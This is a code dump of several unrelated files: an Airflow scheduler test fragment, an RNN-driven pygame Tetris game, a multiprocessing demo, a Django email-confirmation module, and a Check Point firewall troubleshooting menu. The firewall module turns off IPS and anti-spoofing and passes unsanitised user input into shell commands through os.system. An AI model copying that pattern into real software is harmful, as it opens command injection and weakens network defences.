    dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
    dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
    task_id = dag_id + '_task'
    DummyOperator(task_id=task_id, dag=dag)

    scheduler = SchedulerJob()
    session = settings.Session()
    dr1 = scheduler.create_dag_run(dag)
    # SUCCESS dag run: its SCHEDULED task should be left alone.
    dr1.state = State.SUCCESS
    tis = dr1.get_task_instances(session=session)
    # assertEquals is a deprecated unittest alias; use assertEqual.
    self.assertEqual(1, len(tis))
    tis[0].state = State.SCHEDULED
    session.merge(dr1)
    session.merge(tis[0])
    session.commit()

    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
    """Create dagruns and ensure only ones with correct states are reset."""
    prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
    # Only QUEUED/SCHEDULED/NONE TIs of a RUNNING dag run count as orphans.
    states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
    states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]

    dag = DAG(dag_id=prefix,
              start_date=DEFAULT_DATE,
              schedule_interval="@daily")
    tasks = []
    # One task per state under test.
    for i in range(len(states)):
        task_id = "{}_task_{}".format(prefix, i)
        task = DummyOperator(task_id=task_id, dag=dag)
        tasks.append(task)

    scheduler = SchedulerJob()
    session = settings.Session()

    # create dagruns
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr1.state = State.RUNNING
    dr2.state = State.SUCCESS
    session.merge(dr1)
    session.merge(dr2)
    session.commit()

    # create taskinstances and set states
    dr1_tis = []
    dr2_tis = []
    for i, (task, state) in enumerate(zip(tasks, states)):
        ti1 = TI(task, dr1.execution_date)
        ti2 = TI(task, dr2.execution_date)
        ti1.refresh_from_db()
        ti2.refresh_from_db()
        ti1.state = state
        ti2.state = state
        dr1_tis.append(ti1)
        dr2_tis.append(ti2)
        session.merge(ti1)
        session.merge(ti2)
        session.commit()

    # Only QUEUED and SCHEDULED of dr1 are reported reset (NONE is already None).
    self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))

    for ti in dr1_tis + dr2_tis:
        ti.refresh_from_db()

    # running dagrun should be reset
    for state, ti in zip(states, dr1_tis):
        if state in states_to_reset:
            self.assertIsNone(ti.state)
        else:
            self.assertEqual(state, ti.state)

    # otherwise not
    for state, ti in zip(states, dr2_tis):
        self.assertEqual(state, ti.state)

    # Restore dr1's TI states so the filter_by_dag_run variant can be checked.
    for state, ti in zip(states, dr1_tis):
        ti.state = state
    session.commit()

    scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)

    # check same for dag_run version
    for state, ti in zip(states, dr2_tis):
        self.assertEqual(state, ti.state)

    session.close()
|
main.py | import argparse
import copy
import random
import sys
import threading
import time
import numpy as np
import tensorflow.keras as ks
import loguru
import json
import pygame
from pygame import K_DOWN, K_LEFT, K_UP, K_RIGHT, K_KP_ENTER
import colors
from piece import Piece
from board import Board, PIECE_FACTORIES
from data_model import DataStore, Instance
from rnn import map_data, split_sequences, STEPS
# Only initialize display and font engines
pygame.display.init()
pygame.font.init()

logger = loguru.logger
# Window geometry: 350 x 400 pixels.
size = width, height = 350, 400
# Shared module-level handles; both are (re)assigned inside play().
data_store = None   # DataStore used to persist human gameplay
state = None        # rolling window of recent game states fed to the RNN
def run_data_store() -> None:
    """Thread target: run the module-level DataStore's blocking write loop."""
    logger.info("Started data runner")
    data_store.run()
def get_inputs_user(event: pygame.event) -> np.ndarray:
    """Snapshot arrow-key states as a 0/1 vector [up, down, left, right].

    *event* is intentionally unused: the whole keyboard state is polled so
    keys held across frames keep registering.
    """
    key = pygame.key.get_pressed()
    return np.array([key[K_UP], key[K_DOWN], key[K_LEFT], key[K_RIGHT]])
def get_rand_piece() -> 'Piece':
    """Create a fresh tetromino from a uniformly random piece factory."""
    # randint is inclusive on both ends, hence the 1-based draw and -1 index.
    factory_index = random.randint(1, len(PIECE_FACTORIES)) - 1
    return PIECE_FACTORIES[factory_index].create_piece()
def calc_score(level: int, rows: int) -> int:
    """Return the classic NES-style score for clearing *rows* lines at *level*.

    Unknown row counts (0, or anything above 4) score zero.
    """
    base = {1: 40, 2: 100, 3: 300, 4: 1200}.get(rows, 0)
    return base * (level + 1)
def calc_speed(level: int) -> int:
    """Frames per gravity step: 48 at level 0, 5 fewer per level, floored at 1."""
    frames = 48 - 5 * level
    return frames if frames > 1 else 1
def print_line(screen: pygame.display, text: str, center: (int, int)) -> None:
    """Render *text* in white at position *center* (top-left anchor).

    NOTE(review): the font is reloaded from disk on every call; caching the
    Font object at module level would avoid repeated loads.
    """
    font = pygame.font.FontType('freesansbold.ttf', 20)
    surface = font.render(text, True, colors.WHITE)
    screen.blit(surface, dest=center)


def print_stats(
        screen: pygame.display,
        level: int,
        score: int,
        lines_cleared: int,
) -> None:
    """Draw the level/score/lines HUD in the sidebar column (x=235)."""
    print_line(screen, "Level: %d" % level, (235, 160))
    print_line(screen, "Score: %d" % score, (235, 180))
    print_line(screen, "Lines: %d" % lines_cleared, (235, 200))
def show_next_up(
        screen: pygame.display,
        board: 'Board',
        piece: 'Piece'
) -> None:
    """Preview the upcoming piece in the sidebar without mutating the real one."""
    print_line(screen, "Next piece:", (225, 10))
    cp = piece.copy()
    # Park the copy at the fixed preview slot, off the playfield.
    cp.pos = np.array([12, 2])
    board.render_piece(screen, cp)


def show_message(
        screen: pygame.display,
        msg: str
) -> None:
    """Clear the screen and display *msg* centered (used for game-over text)."""
    screen.fill(colors.BLACK)
    font = pygame.font.FontType('freesansbold.ttf', 20)
    surface = font.render(msg, True, colors.WHITE)
    rectangle = surface.get_rect()
    rectangle.center = (width // 2, height // 2)
    screen.blit(surface, rectangle)
    pygame.display.update()
def predict_inputs(model, curr_input):
    """Feed the rolling state window through the model and return a key vector.

    Mutates the module-level ``state`` window in place: drops the oldest
    entry and appends the serialized *curr_input*.
    """
    global state
    state.pop(0)
    state.append(json.loads(str(curr_input)))
    (b, aux), _ = map_data(state)
    b, aux, _ = split_sequences(b, aux, None, STEPS)
    raw_inputs = model.predict(
        {
            "board": b[0:1],
            "aux": aux[0:1],
        }
    )[0]
    # Bias activations up by 0.3 before rounding, i.e. a "press" threshold of
    # ~0.2 instead of 0.5.
    inputs = np.round(raw_inputs + 0.3)
    # Index 1 is forced off — presumably the DOWN key, mirroring
    # get_inputs_user's [up, down, left, right] order; TODO confirm.
    inputs[1] = 0
    return inputs
def play(**kwargs) -> None:
    """Run one complete game, either human-driven or model-driven.

    Keyword args:
        name: data-set name used for the DataStore (human play only).
        model_file: path to a trained Keras model; None means human play.

    Side effects: opens the pygame window, spawns a DataStore writer thread
    for human play, and may call sys.exit() on quit.
    """
    # Initialize game data
    score = 0
    level = 0
    lines_cleared = 0
    random.seed(time.time())
    screen = pygame.display.set_mode(size)
    TIME_BETWEEN_TICKS = 0.5
    last_tick_time = time.time()
    screen.fill(colors.BLACK)

    # Initial render
    board = Board()
    board.render(screen)
    pygame.display.update()

    # Initial pieces
    piece = get_rand_piece()
    npiece = get_rand_piece()
    curr_input = Instance(board.get_board(), np.array([0, 0, 0, 0]),
                          np.array([0, 0, 0, 0]), npiece.ID)

    # Determine if a model was provided to play
    isModel = False
    model = None
    model_file = kwargs.get("model_file", "default")
    global state
    state = []
    if model_file is not None:
        isModel = True
        # Model play runs effectively as fast as it can render.
        TIME_BETWEEN_TICKS = 0.001
        model = ks.models.load_model(model_file)
        # Seed the rolling window with copies of the initial state.
        curr_state = json.loads(str(curr_input))
        for i in range(STEPS+1):
            state.append(copy.deepcopy(curr_state))

    # Initialize data collection (human play only)
    global data_store
    if not isModel:
        data_store = DataStore(kwargs.get("name", "default"))
        data_store_thread = threading.Thread(target=run_data_store)
        data_store_thread.start()

    # Game loop
    while not board.game_over():
        # Clear screen and inputs
        screen.fill(colors.BLACK)
        inputs = np.array([0, 0, 0, 0])
        show_next_up(screen, board, npiece)

        # Handle events
        if isModel:
            curr_input = Instance(
                board.get_board(),
                curr_input.current_move,
                inputs,
                npiece.ID
            )
            inputs = predict_inputs(model, curr_input)
        else:
            for event in pygame.event.get():
                if event.type == pygame.KEYDOWN:  # User provided input
                    inputs = get_inputs_user(event)
                    curr_input = Instance(
                        board.get_board(),
                        curr_input.current_move,
                        inputs,
                        npiece.ID
                    )
                    data_store.write(str(curr_input))
                if event.type == pygame.QUIT:  # Peacefully exit
                    data_store.stop(write=False)
                    data_store_thread.join()
                    sys.exit()

        piece = board.apply_command(piece, inputs)  # Get updated piece

        # Simple game tick control, runs for each game tick
        if time.time() - last_tick_time > TIME_BETWEEN_TICKS:
            piece = board.move_down(piece)
            last_tick_time = time.time()
            curr_input = Instance(
                board.get_board(),
                curr_input.current_move,
                inputs,
                npiece.ID
            )
            if isModel:
                inputs = predict_inputs(model, curr_input)
            else:
                data_store.write(str(curr_input))

        # Redraw board and moving piece
        board.render(screen)
        board.render_piece(screen, piece)

        if piece.isSet:  # collided with bottom or another piece on tick
            curr_input = Instance(
                board.get_board(),
                curr_input.current_move,
                inputs,
                npiece.ID
            )
            if isModel:
                inputs = predict_inputs(model, curr_input)
            else:
                data_store.write(str(curr_input))
            # Bring in next piece, get next piece
            piece = npiece.copy()
            npiece = get_rand_piece()
            # Update stats
            removed_rows = board.check_rows()
            lines_cleared += removed_rows
            score += calc_score(level, removed_rows)
            level = lines_cleared // 10

        # Update screen
        print_stats(screen, level, score, lines_cleared)
        pygame.display.update()

    # Game over messages and clean up
    if isModel:
        show_message(screen, "Game Over - Score: {}".format(score))
    else:
        show_message(screen, "Game Over - Score: {} | saving...".format(score))
        data_store.stop()
        data_store_thread.join()
        show_message(screen, "Game Over - Score: {} | saved.".format(score))
        logger.info("Game over, data saved.")

    # Wait for Enter (return to caller for a new game) or Q/quit (exit).
    pygame.event.clear()
    while 1:
        for event in pygame.event.get():
            if event.type == pygame.QUIT or \
                    pygame.key.get_pressed()[K_KP_ENTER]:
                return
            if hasattr(event, "key"):
                if event.key == 13:  # Return key
                    return
                if event.key == 113:  # 'q'
                    sys.exit()
def main(**kwargs) -> None:
    """Run games back to back until play() terminates the process."""
    while True:
        play(**kwargs)


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    # Data-set name used when recording human games.
    parser.add_argument("-n", "--name", default="default")
    # Path to a trained model; omit for human play.
    parser.add_argument("-m", "--model", default=None)
    args = parser.parse_args()
    main(name=args.name, model_file=args.model)
|
process_demo.py | from multiprocessing import Process
import os
def factorial(n):
    """Recursively compute n! for non-negative integer n."""
    if n in (0, 1):
        return 1
    return n * factorial(n - 1)
def info(title):
    """Print a banner identifying this process and its parent PID."""
    print(title)
    print('module name:', __name__)
    print('parent process:', os.getppid())
    print('process id:', os.getpid())


def f(name):
    """Child-process entry point: report process info, then greet *name*."""
    info('function f')
    print('hello', name)
    #print(factorial(n))
if __name__ == '__main__':
    # Demonstrate that the child sees a different PID and this PID as parent.
    info('main line')
    p = Process(target=f, args=('bob',))
    p.start()
    p.join()
Confirm.py | from binascii import Error as b64Error
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from base64 import urlsafe_b64decode, urlsafe_b64encode
from smtplib import SMTP
from threading import Thread
from django.conf import settings
from django.template.loader import render_to_string
from django.urls import get_resolver
from django.contrib.auth import get_user_model, login, logout
from django.contrib.auth.tokens import default_token_generator
from django.utils import timezone
from .errors import InvalidUserModel, EmailTemplateNotFound, NotAllFieldCompiled
def sendConfirm(user, **kwargs):
    """Deactivate *user*, build a confirmation token and mail the link.

    The mail itself is sent on a background thread so the request is not
    blocked by SMTP. An explicit ``token`` kwarg overrides token generation.

    Raises:
        InvalidUserModel: the user model lacks the configured active field
            (or another required attribute).
    """
    active_field = validateAndGetField('EMAIL_ACTIVE_FIELD')
    try:
        setattr(user, active_field, False)
        user.save()
        # Prefer an explicitly supplied token; membership test instead of the
        # original try/except KeyError keeps behavior for token=None callers.
        token = kwargs['token'] if 'token' in kwargs else \
            default_token_generator.make_token(user)
        email = urlsafe_b64encode(str(user.email).encode('utf-8'))
        t = Thread(target=sendConfirm_thread,
                   args=(user.email, f'{email.decode("utf-8")}/{token}'))
        t.start()
    except AttributeError:
        raise InvalidUserModel('The user model you provided is invalid')
def sendConfirm_thread(email, token):
    """Build and send the confirmation mail to *email* over SMTP+STARTTLS.

    *token* is the "<b64-email>/<token>" path suffix appended to the verify
    URL. Raises NotAllFieldCompiled / EmailTemplateNotFound on bad config.
    """
    sender = validateAndGetField('EMAIL_SERVER')
    domain = validateAndGetField('EMAIL_PAGE_DOMAIN')
    subject = validateAndGetField('EMAIL_MAIL_SUBJECT')
    address = validateAndGetField('EMAIL_ADDRESS')
    port = validateAndGetField('EMAIL_PORT', default_type=int)
    password = validateAndGetField('EMAIL_PASSWORD')
    mail_plain = validateAndGetField('EMAIL_MAIL_PLAIN', raise_error=False)
    mail_html = validateAndGetField('EMAIL_MAIL_HTML', raise_error=False)
    if not (mail_plain or mail_html):  # Validation for mail_plain and mail_html as both of them have raise_error=False
        raise NotAllFieldCompiled(f"Both EMAIL_MAIL_PLAIN and EMAIL_MAIL_HTML missing from settings.py, at least one of them is required.")
    domain += '/' if not domain.endswith('/') else ''

    msg = MIMEMultipart('alternative')
    msg['Subject'] = subject
    msg['From'] = sender
    msg['To'] = email

    # Imported here to avoid a circular import at module load time.
    from .views import verify
    link = ''
    # Resolve the URL pattern registered for the verify view and splice the
    # token in place of its parameter ('%' marks the placeholder start).
    for k, v in get_resolver(None).reverse_dict.items():
        if k is verify and v[0][0][1][0]:
            addr = str(v[0][0][0])
            link = domain + addr[0: addr.index('%')] + token

    if mail_plain:
        try:
            text = render_to_string(mail_plain, {'link': link})
            part1 = MIMEText(text, 'plain')
            msg.attach(part1)
        except AttributeError:
            pass
    if mail_html:
        try:
            html = render_to_string(mail_html, {'link': link})
            part2 = MIMEText(html, 'html')
            msg.attach(part2)
        except AttributeError:
            pass
    if not msg.get_payload():
        raise EmailTemplateNotFound('No email template found')

    server = SMTP(sender, port)
    server.starttls()
    server.login(address, password)
    server.sendmail(address, email, msg.as_string())
    server.quit()
def validateAndGetField(field, raise_error=True, default_type=str):
    """Read *field* from Django settings, requiring a non-empty value of
    *default_type*.

    Returns the value, or None when invalid and *raise_error* is False.

    Raises:
        NotAllFieldCompiled: the setting is missing/empty/wrong-typed and
            *raise_error* is True.
    """
    try:
        value = getattr(settings, field)
        # Treat empty or wrong-typed values exactly like a missing setting.
        if value == "" or value is None or not isinstance(value, default_type):
            raise AttributeError
        return value
    except AttributeError:
        if raise_error:
            raise NotAllFieldCompiled(f"Field {field} missing or invalid")
        return None
def verifyToken(email, email_token):
    """Activate the user matching base64-encoded *email* if *email_token* checks out.

    Returns True on success; False for bad tokens, unknown users or
    malformed base64 input.
    """
    try:
        users = get_user_model().objects.filter(email=urlsafe_b64decode(email).decode("utf-8"))
        for user in users:
            valid = default_token_generator.check_token(user, email_token)
            if valid:
                active_field = validateAndGetField('EMAIL_ACTIVE_FIELD')
                setattr(user, active_field, True)
                # Touch last_login so the token (which hashes it) is invalidated.
                user.last_login = timezone.now()
                user.save()
                return valid
    except b64Error:
        # Malformed base64 in the URL — treat as an invalid link.
        pass
    return False
|
troubleshooting.py | #
# Copyright 2020 by 0x7c2, Simon Brecht.
# All rights reserved.
# This file is part of the Report/Analytic Tool - CPme,
# and is released under the "Apache License 2.0". Please see the LICENSE
# file that should have been included as part of this package.
#
from subprocess import Popen, PIPE, STDOUT
import logme
import os
import func
import sys
import time
import datetime
import signal
import threading
# Menu definition: each entry is [label, python-expression-to-eval].
menu_text = "Troubleshooting Options"
menu_item = [ ["Run fw monitor with filter", "troubleshooting.fwmonitor()"],
              ["Run tcpdump with filter", "troubleshooting.tcpdump()"],
              ["Run tcpdump, capture fragmented packets","troubleshooting.tcpdump('-i any \"(ip[6:2] & 0x1fff) != 0\" -nn')"],
              ["Run zdebug with options", "troubleshooting.zdebug()"],
              ["Print connection table - raw", "troubleshooting.print_table('connections')"],
              ["Print connection table - formatted", "troubleshooting.print_table('connections', True)"],
              ["Clear connection table (ALL!)", "troubleshooting.clear_table('connections')"],
              ["Clear specific connections from table","troubleshooting.clear_table_input('connections')"],
              ["STOP CheckPoint Services", "troubleshooting.run_cpstop()"],
              ["STOP CheckPoint Services and keep policy","troubleshooting.run_cpstop('-fwflag -proc')"],
              ["UNLOAD Security/TP Policy", "troubleshooting.load_policy(False)"],
              ["FETCH Security/TP Policy", "troubleshooting.load_policy(True)"],
              ["Disable Antispoofing", "troubleshooting.run_spoofing(0)"],
              ["Enable Antispoofing", "troubleshooting.run_spoofing(1)"],
              ["ClusterXL Status", "troubleshooting.clusterxl_status()"],
              ["SecureXL DoS Mitigation Status", "troubleshooting.run_securexl_dos()"],
              ["Display VPN Tunnel Status", "troubleshooting.print_vpn()"]]
# Extra entries depending on gateway type / firewall mode.
if func.isFirewall() and not func.isFWUserMode():
    menu_item.append(["TOP 15 heavy F2F Connections (specific worker)", "troubleshooting.select_f2f_stats()"])
    menu_item.append(["TOP 15 heavy F2F Connections (all worker!)", "troubleshooting.print_f2f_stats(-1)"])
if func.isFirewall() and func.isFWUserMode():
    menu_item.append(["Display user-mode cpu ressources", "troubleshooting.run_top('-H -p `pidof fwk`')"])
if func.isFirewall():
    menu_item.append(["Measure kernel delay (EXPERIMENTAL!)", "troubleshooting.fwkern_delay()"])
    menu_item.append(["Disable IPS on the fly", "troubleshooting.run_ips(False)"])
    menu_item.append(["Enable IPS on the fly", "troubleshooting.run_ips(True)"])
    menu_item.append(["Print heavy conns detected by CoreXL", "troubleshooting.print_heavy_conn()"])
menu_item.append(["Back to Main Menu", "menu_set('main')"])
def get_results(clear = False):
    """Return accumulated results; optionally clear the buffer afterwards."""
    global results
    res = results
    if clear:
        results = []
    return res

def add_text():
    """Menu hook: return this module's menu title."""
    return menu_text

def add_item():
    """Menu hook: return this module's menu entries."""
    return menu_item

def print_results():
    """Flush accumulated results to the logger and reset the buffer."""
    global results
    logme.results(results)
    results = []

# Shared state for the kernel-delay measurement (fwkern_* functions).
connections = {}      # (src, sport, dst, dport) -> per-connection timing dict
match_forward = 0     # packets matched in the forward direction
match_reverse = 0     # packets matched in the reverse direction
stopme = False        # cooperative stop flag for the capture thread
local_ips = []        # gateway-local addresses, filled by fwkern_get_ifaces()
def fwkern_get_ifaces():
    """Populate local_ips with the gateway's own IPv4 addresses (via ifconfig)."""
    global local_ips
    ipaddr = []
    out, err = func.execute_command("ifconfig | grep 'inet addr'")
    for line in out:
        # "inet addr:10.0.0.1  Bcast:..." -> first token after stripping prefix
        tmp = line.replace('inet addr:','').split()
        ipaddr.append(tmp[0])
    local_ips = ipaddr
def fwkern_check_inbound(iface):
    """Return True when an `fw monitor` interface token marks an inbound hop.

    Tokens look like "<name>:<pos>[...]" where position letter "i" is the
    pre-inbound inspection point.
    """
    # Direct comparison instead of the verbose if/else-True/False form.
    position = iface.split(":")[1].split("[")[0]
    return position == "i"
def fwkern_calc_delay(time1, time2):
    """Return time2 - time1 (both 'HH:MM:SS.micro') as a seconds string.

    str(timedelta) looks like "0:00:01.500000"; slicing off the first six
    characters leaves just the seconds part.
    """
    fmt = '%H:%M:%S.%f'
    start = datetime.datetime.strptime(time1, fmt)
    end = datetime.datetime.strptime(time2, fmt)
    return str(end - start)[6:]
def fwkern_parse(one, two):
    """Correlate a pair of `fw monitor` lines into the connections table.

    *one* is the IP-level line (worker, timestamp, interface, addresses),
    *two* the transport-level line (ports). Tracks in/out timestamps per
    4-tuple and accumulates byte counts; updates the global match counters.

    Fix: local names no longer shadow the builtins len/id/tuple; the unused
    `date` field is skipped.
    """
    global connections
    global match_forward
    global match_reverse
    global local_ips
    l1 = one.split()
    l2 = two.split()
    worker = l1[0]
    ts = l1[2]
    interface = l1[3]
    src = l1[4]
    dst = l1[6]
    pkt_len = l1[8].replace("len=", "")
    pkt_id = l1[9]
    src_port = l2[1]
    dst_port = l2[3]
    fwd_key = (src, src_port, dst, dst_port)
    rev_key = (dst, dst_port, src, src_port)
    # filter out connection from or to gateway
    if src in local_ips or dst in local_ips:
        return
    # check forward connection mapping
    if fwd_key in connections:
        entry = connections[fwd_key]
        if fwkern_check_inbound(interface):
            entry["in"] = ts
        else:
            entry["out"] = ts
            entry["delay"] = fwkern_calc_delay(entry["in"], entry["out"])
        entry["bytes"] = str(int(entry["bytes"]) + int(pkt_len))
        match_forward = match_forward + 1
        return
    # check reverse connection mapping
    if rev_key in connections:
        entry = connections[rev_key]
        if fwkern_check_inbound(interface):
            entry["in"] = ts
        else:
            entry["out"] = ts
            entry["delay"] = fwkern_calc_delay(entry["in"], entry["out"])
        entry["bytes"] = str(int(entry["bytes"]) + int(pkt_len))
        match_reverse = match_reverse + 1
        return
    # first sighting of this 4-tuple
    connections[fwd_key] = {"worker": worker, "time": ts, "interface": interface,
                            "id": pkt_id, "len": pkt_len, "in": ts, "out": "-1",
                            "delay": "-1", "bytes": "0"}
def fwkern_start():
    """Run `fw monitor` and feed paired TCP/UDP output lines to fwkern_parse.

    Runs until EOF or until the global `stopme` flag is set by the consumer.
    """
    global stopme
    stopme = False
    fwkern_get_ifaces()
    cmd = "fw monitor -T -m iO"
    p = Popen(cmd, stdout=PIPE, stderr=STDOUT, shell=True, bufsize=1,
              universal_newlines=True)
    line_first = None
    # BUG FIX: with universal_newlines=True readline() returns str, so the
    # sentinel must be '' — the original b'' could never match and the loop
    # would spin forever after EOF.
    for line in iter(p.stdout.readline, ''):
        if stopme:
            # break (not return) so the process is still closed and reaped
            break
        tmp = line.strip('\n')
        # exclude other protocols than tcp or udp
        if "(TCP)" in tmp or "(UDP)" in tmp:
            # matched first line of output
            line_first = tmp
        if "TCP:" in tmp or "UDP:" in tmp:
            # matched second line; guard against it appearing before any first line
            if line_first is not None:
                fwkern_parse(line_first, tmp)
    p.stdout.close()
    p.wait()
    stopme = True
def fwkern_output():
    """Console loop: redraw the top-25 highest-delay connections once a second.

    Reads the tables filled by fwkern_start(); exits on CTRL+C or when
    `stopme` is set. Uses ANSI cursor-up/erase codes to redraw in place.
    """
    global connections
    global stopme
    global match_forward
    global match_reverse
    max = 25
    CURSOR_UP_ONE = '\x1b[1A'
    ERASE_LINE = '\x1b[2K'
    printed = False
    print("** Starting Kernel Debug! Just wait a second...")
    print("** Press CTRL+C to exit.")
    print("")
    # Give the capture thread time to accumulate data before first draw.
    time.sleep(10)
    try:
        while(True):
            if printed:
                # Erase the previous frame (rows printed + header lines).
                for i in range(1, count + 5):
                    sys.stdout.write(CURSOR_UP_ONE)
                    sys.stdout.write(ERASE_LINE)
            count = 0
            if stopme: break
            output = "* Last Update: " + str(datetime.datetime.now())
            output = output + "\n" + "* Seen connections count: " + str(len(connections))
            output = output + "\n" + "* Matching Tuples; Forward=" + str(match_forward) + " , Reverse=" + str(match_reverse) + "\n\n"
            # NOTE(review): "delay" is compared as a string, so ordering is
            # lexicographic, not numeric — confirm whether that is intended.
            for key, val in reversed(sorted(connections.items(), key=lambda item: item[1]["delay"])):
                if val["delay"] != "-1":
                    if count > max: break
                    if stopme: break
                    delay = str(val["delay"])
                    bytes = str(val["bytes"])
                    mylen = 55
                    mylen = mylen - len(str(key))
                    output = output + (str(key) + mylen*" " + ", Delay: " + str(delay) + " seconds, bytes: " + str(bytes)) + "\n"
                    count = count + 1
            sys.stdout.write(output)
            sys.stdout.flush()
            printed = True
            time.sleep(1)
    except KeyboardInterrupt:
        pass
    print("** Stopping Kernel Debug! Just wait a second...")
    stopme = True
def fwkern_delay():
    """Entry point: capture in a background thread, display in the foreground.

    Cleans up by signalling `stopme`, joining the thread and unloading the
    fw monitor module (`fw monitor -U`).
    """
    global stopme
    t1 = threading.Thread(target=fwkern_start)
    t1.start()
    fwkern_output()
    stopme = True
    t1.join()
    os.system("fw monitor -U")
    print("** Done!")
def ip2hex(ipaddr):
    """Convert a dotted-quad IP to 8 lowercase hex chars as used by `fw tab`.

    An empty string maps to the wildcard "ffffffff".
    """
    if ipaddr == "":
        return "ffffffff"
    # %02x already yields lowercase, so the original replace('0x','')/lower()
    # post-processing was dead code.
    return "".join("%02x" % int(octet) for octet in ipaddr.split('.'))
def run_ips(ena):
    """Toggle IPS on the fly (`ips on` / `ips off -n`), after confirmation."""
    print("")
    if ena:
        cmd = "ips on"
    else:
        cmd = "ips off -n"
    func.confirm(cmd)
    print("")

def run_securexl_dos():
    """Show SecureXL DoS mitigation config and statistics."""
    print("")
    cmd = "fwaccel dos config get ; fwaccel dos stats get"
    print("Executing command:")
    print(cmd)
    os.system(cmd)
    print("")

def run_spoofing(val):
    """Set both anti-spoofing kernel flags to *val* (0=off, 1=on)."""
    print("")
    print("Modify kernel parameters for spoofing:")
    cmd = "fw ctl set int fw_antispoofing_enabled " + str(val)
    func.confirm(cmd)
    cmd = "fw ctl set int fw_local_interface_anti_spoofing " + str(val)
    func.confirm(cmd)
    print("")

def run_cpstop(parms = ""):
    """Stop Check Point services, optionally with extra cpstop flags."""
    print("")
    print("Stopping CheckPoint Services...")
    cmd = "cpstop " + parms
    func.confirm(cmd)
    print("")

def print_heavy_conn():
    """Print heavy connections detected by CoreXL."""
    print("")
    print("Printing heavy connections:")
    print("fw ctl multik print_heavy_conn")
    print(" ")
    os.system("fw ctl multik print_heavy_conn")
    print("")

def run_top(filter = ""):
    """Run `top` with optional extra arguments (e.g. '-H -p <pid>')."""
    print("")
    print("Running top command:")
    cmd = "top " + filter
    print(cmd)
    print("")
    os.system(cmd)
    print("")
def zdebug():
    """Interactively build and run an `fw ctl zdebug` command, then reset the
    kernel debug filter afterwards."""
    print("")
    print("Defaults listed in brackets, just press return")
    print("to accept. Press STRG+C to stop debug!")
    print("")
    buf = input("Enter buffer [1024]: ")
    if buf != "":
        buf = "-buf " + buf + " "
    mod = input("Enter module [fw]   : ")
    if mod != "":
        mod = "-m " + mod
    opt = input("Enter options [drop]: ")
    if opt == "":
        opt = "drop"
    print("")
    fil = input("Enter grep filter []: ")
    if fil != "":
        # NOTE(review): no pipe character is prepended here — verify the
        # resulting command line against a live gateway.
        fil = " grep -i '"+fil+"'"
    cmd = "fw ctl zdebug " + buf + mod + " + " + opt + fil
    print("")
    print("Executing command:")
    print(cmd)
    print("")
    os.system(cmd)
    print("")
    print("Resetting kernel filter...")
    cmd = "fw ctl debug 0"
    print(cmd)
    os.system(cmd)
    print("")
def load_policy(ena):
    """Fetch (ena=True) or unload (ena=False) the security and TP policies.

    Fetching prompts for the management server IP; each command is run only
    after user confirmation.
    """
    print("")
    if ena:
        s = input("Enter Security Management Server IP: ")
        cmd = "fw fetch " + s
        print("")
        func.confirm(cmd)
        print("")
        cmd = "fw amw fetch " + s
        func.confirm(cmd)
    else:
        cmd = "fw unloadlocal"
        func.confirm(cmd)
        print("")
        cmd = "fw amw unload"
        func.confirm(cmd)
def fwmonitor():
    """Prompt for an fw monitor filter expression and run the capture."""
    print("Example(s) for filter string:")
    print("host(1.1.1.1)")
    print("net(192.168.0.0,24)")
    print("icmp")
    print("")
    s = input("Enter filter string: ")
    print("")
    print("Executing command:")
    cmd = 'fw monitor -e "accept ' + s + ';"'
    print(cmd)
    print("")
    os.system(cmd)

def tcpdump(filter = ""):
    """Run tcpdump; prompts for interface and filter when none is given.

    *filter* stays as the parameter name for caller compatibility even
    though it shadows the builtin.
    """
    if filter == "":
        print("Example(s) for interface:")
        print("eth1")
        print("eth6.101")
        print("")
        print("Example(s) for filter string:")
        print("host 1.1.1.1")
        print("icmp")
        print("")
        # Renamed from `int`, which shadowed the builtin.
        iface = input("Enter interface     : ")
        fil = input("Enter filter string: ")
        print("")
        cmd = "tcpdump -i " + iface + " -s0 -nnnnn -vvvvvv " + fil
    else:
        cmd = "tcpdump " + filter
    print("Executing command:")
    print(cmd)
    print("")
    os.system(cmd)
def print_vpn():
    """Print a table of VPN tunnels from the kernel tables.

    Combines `local_meta_sas` (tunnel/subnet info) with `resolved_link`
    (peer link addresses), both read via `fw tab`.
    """
    vpn_table_tab = "local_meta_sas"
    vpn_table = []
    vpn_links = {}
    logme.loader()
    # Skip the 3-line header and continuation rows ('->').
    out, err = func.execute_command("fw tab -t " + vpn_table_tab + " -u | awk 'NR>3 { print $0 }' | grep -v '\->'")
    for line in out:
        logme.loader()
        tmp = line.strip("\n").strip("<").strip(">")
        tmp = tmp.split(",")
        if len(tmp) > 10:
            vpn_table.append(tmp)
    out, err = func.execute_command("fw tab -t resolved_link -u | awk 'NR>3 { print $0 }'")
    for line in out:
        logme.loader()
        tmp = line.strip("\n").strip("<").strip(">")
        remote_id = tmp.split(';')[0]
        data = tmp.split(',')
        # Keep only the first link entry per remote peer.
        if not remote_id in vpn_links and len(data) > 10:
            vpn_links[remote_id] = data[1].strip(' ')
    print(" %-8s %17s %17s %20s %20s" % ("ID", "Remote IP", "Resolved Link", "Local Subnet", "Remote Subnet"))
    print(" " + 86*"=")
    for e in vpn_table:
        tunnel_id = e[10].strip(' ')
        remote_ip = func.hex2ip(e[0])
        if e[0] in vpn_links:
            remote_link = func.hex2ip(vpn_links[e[0]])
        else:
            remote_link = "0.0.0.0"
        local_subnet = func.calc_subnet(func.hex2ip(e[1]), func.hex2ip(e[2]))
        remote_subnet = func.calc_subnet(func.hex2ip(e[3]), func.hex2ip(e[4]))
        print(" %-8s %17s %17s %20s %20s" % (tunnel_id, remote_ip, remote_link, local_subnet, remote_subnet))
def print_table(fwtab, formatted = False):
    """Dump firewall kernel table *fwtab* via `fw tab` (optionally formatted)."""
    print("")
    flags = " -u -f" if formatted else " -u"
    cmd = "fw tab -t {}{}".format(fwtab, flags)
